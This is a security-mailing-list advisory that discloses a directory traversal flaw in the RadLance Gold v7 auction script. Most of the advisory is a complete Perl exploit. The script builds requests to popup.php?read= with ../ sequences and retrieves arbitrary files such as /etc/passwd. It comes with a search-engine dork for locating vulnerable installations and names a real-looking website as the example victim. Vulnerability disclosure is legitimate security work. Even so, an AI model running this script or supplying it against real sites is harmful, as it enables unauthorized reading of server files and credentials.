The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
RadLance Directory Traversal (Exploit)
------------------------------------------------------------------------
SUMMARY
" <http://www.radscripts.com/> Rad Scripts was born from the idea that
solid freelance, php auction scripts, programs and software solutions can
be made, simple to use with a single administrative interface, be feature
rich, efficient, easy to install, produce income and affordable."
Improper input filtering with RadLance allows attackers to cause a
directory traversal, and retrieve any file on the running system.
DETAILS
Vulnerable Systems:
* RadLance Gold version 7
Exploit:
#!/usr/bin/perl
#Discovered and coded by Mr.CrackerZ ( Security Team )
#Contact me ( bo_ali90@hotmail.com )
#Usage: radlance.pl <victim> <local file to read>
#Google: Powered by: RadLance Gold v7
#Tested Under RadLance Gold v7 ( Local Inclusion Exploit )
#Example:
http://www.getabuilder.co.uk/popup.php?read=../../../../../../../../../etc/passwd
#Perl example: radlance.pl www.getabuilder.co.uk
./../../../../../../../../etc/passwd
#################################################
use IO::Socket;
if(@ARGV < 2){
print "
+*************************************************************************+
Exploit Discovered and coded by Mr.CrackerZ ( Security Team )
radlance.pl <victim> <local file to read>
<victim> = www.example.com
<local file to read> = ../../../../../../../../../etc/passwd
+*************************************************************************+
";
exit();
}
#Local variables
$wbbserver = $ARGV[0];
$wbbserver =~ s/(http:\/\/)//eg;
$wbbhost = "http://".$wbbserver;
$port = "80";
$wbbtar = "/popup.php?read=";
$wbbxp = $ARGV[1];
$wbbreq = $wbbhost.$wbbtar.$wbbxp;
#Writing data to socket
print "\r\n";
print "+ Trying to connect: $wbbserver\n";
$wbb = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$wbbserver",
PeerPort => "$port") || die "\n+ Connection failed...\n";
print $wbb "GET $wbbreq\n";
print $wbb "Host: $wbbserver\n";
print $wbb "Accept: */*\n";
print $wbb "Connection: close\n\n";
print "+ Connected!...\n";
print "\r\n";
print
"+**********************************************************************+\n";
while($answer = <$wbb>) {
print <$wbb>;
printf "\r\n";
}
print
"+**********************************************************************+\n\ncopy
the code and save it as .html or .php depend the file u are trying
to\naccess to , and if u saw the file cont so you got what u need :)\n";
#EoF
ADDITIONAL INFORMATION
The information has been provided by <mailto:bo_ali90@hotmail.com>
Hussain Salim.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
